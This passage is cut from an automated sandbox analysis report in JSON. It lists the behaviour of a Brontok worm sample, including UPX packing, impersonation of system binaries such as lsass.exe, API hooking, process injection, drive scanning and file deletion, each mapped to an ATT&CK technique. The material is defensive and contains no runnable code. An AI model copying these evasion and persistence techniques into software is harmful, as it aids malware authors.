UPX1 with entropy \"7.85055163958\"\n \"4K51K4.EXE.67A9DE16.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SERVICES.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"SMSS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"LSASS.EXE\" has section name UPX1 with entropy \"7.85055163958\"\n \"MrHelloween.scr\" has section name UPX1 with entropy \"7.85055163958\"\n \"IEXPLORER.EXE.67A9C38C.bin\" has section name UPX1 with entropy \"7.85055163958\"\n \"WINLOGON.EXE\" has section name UPX1 with entropy \"7.85055163958\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-7", "relevance": 10, "name": "PE file is packed with UPX", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has a section named \"UPX0\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201\" has a section named \"UPX1\"\n \"services.exe\" has a section named \"UPX0\"\n \"services.exe\" has a section named \"UPX1\"\n \"4k51k4.exe.bin\" has a section named \"UPX0\"\n \"4k51k4.exe.bin\" has a section named \"UPX1\"\n \"shell.exe\" has a section named \"UPX0\"\n \"shell.exe\" has a section named \"UPX1\"\n \"Empty.pif\" has a section named \"UPX0\"\n \"Empty.pif\" has a section named \"UPX1\"\n \"4K51K4.EXE.67A9C38A.bin\" has a section named \"UPX0\"\n \"4K51K4.EXE.67A9C38A.bin\" has a section named \"UPX1\"\n \"CSRSS.EXE.bin\" has a section named \"UPX0\"\n \"CSRSS.EXE.bin\" has a section named \"UPX1\"\n \"4K51K4.EXE.67A9DE16.bin\" has a section named \"UPX0\"\n \"4K51K4.EXE.67A9DE16.bin\" has a section named \"UPX1\"\n \"SERVICES.EXE\" has a section named \"UPX0\"\n \"SERVICES.EXE\" has a section named \"UPX1\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" has a section named \"UPX0\"\n \"IEXPLORER.EXE.67A9DF9D.bin\" has a section named \"UPX1\"\n \"SMSS.EXE\" has a section named \"UPX0\"\n \"SMSS.EXE\" has a section named \"UPX1\"\n \"LSASS.EXE\" has a section named \"UPX0\"\n \"LSASS.EXE\" has a section named \"UPX1\"\n \"MrHelloween.scr\" has a section named \"UPX0\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 0M (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FileTimeToLocalFileTime\" with parameter fed9aada937bdb01 & fe416f3c9c7bdb01 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FileTimeToLocalFileTime\" with parameter 21ad2ce09b7bdb01 & 2115f141a47bdb01 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FileTimeToLocalFileTime\" with parameter 7f5fb4da937bdb01 & 7fc7783c9c7bdb01 (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"FileTimeToLocalFileTime\" with parameter tgL & 74cf107fa67bdb01 (UID: 00000000-00005192)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00005192)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00005192)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "hooks-0", "type": 11, "relevance": 10, "name": "Hooks API calls", "description": "\"LoadLibraryExW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateProcessW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"RemoveDirectoryA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"Process32NextW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateRemoteThread@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateDirectoryA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateProcessA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"RemoveDirectoryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CopyFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadResource@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindResourceA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CopyFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"\n \"GetNativeSystemInfo@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"WinExec@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateToolhelp32Snapshot@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"Process32FirstW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"GetProcAddress@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryExA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"CreateDirectoryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"LoadLibraryW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"OpenMutexA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindResourceW@KERNEL32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\4K51K4.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\4K51K4.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\4K51K4.EXE\" with delete access\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\share\\4K51K4\\New Folder.exe\" for deletion\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "binary-11", "type": 8, "relevance": 10, "name": "The analysis extracted a file that was identified as malicious", "description": "16/22 Antivirus vendors marked dropped file \"services.exe\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"lsass.exe\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"IExplorer.exe\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"4k51k4.exe\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"winlogon.exe\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"smss.exe\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"csrss.exe\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"LSASS.EXE\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"SMSS.EXE\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"SERVICES.EXE\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"WINLOGON.EXE\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)\n 16/22 Antivirus vendors marked dropped file \"CSRSS.EXE\" as malicious (classified as \"Worm.Brontok\" with 72% detection rate)", "origin": "Binary File", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"K:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"L:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"M:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"N:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"O:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"P:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"Q:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"R:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"S:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"T:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"U:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"V:\"\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" (UID: 00000000-00005192)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005636)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005272)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00003900)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005632)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002108)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005328)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00004156)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003136)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005500)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003236)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003752)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003220)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005756)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002164)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005308)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000944)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000932)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003276)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005584)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00000812)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005732)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00001872)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000656)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002040)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005000)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005508)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005428)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003156)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00005912)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00006032)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005928)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004188)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004288)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005892)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004348)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006064)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005936)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005804)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004580)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005548)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006016)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00001208)\n Spawned process \"4k51k4.exe\" (UID: 00000000-00006104)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004116)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002432)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004780)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004144)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004200)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004440)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003868)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004020)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001556)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004540)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 368)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 380)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 608)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 608)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 608)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 576)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 576)\n \"ab3936eba60727da14a556d2ae32b43f8b052f1550efd5a45d828ced68729201.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 576)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 340)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 340)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\4k51k4.exe\" (Handle: 340)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 340)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 340)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 340)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"4k51k4.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 340)\n 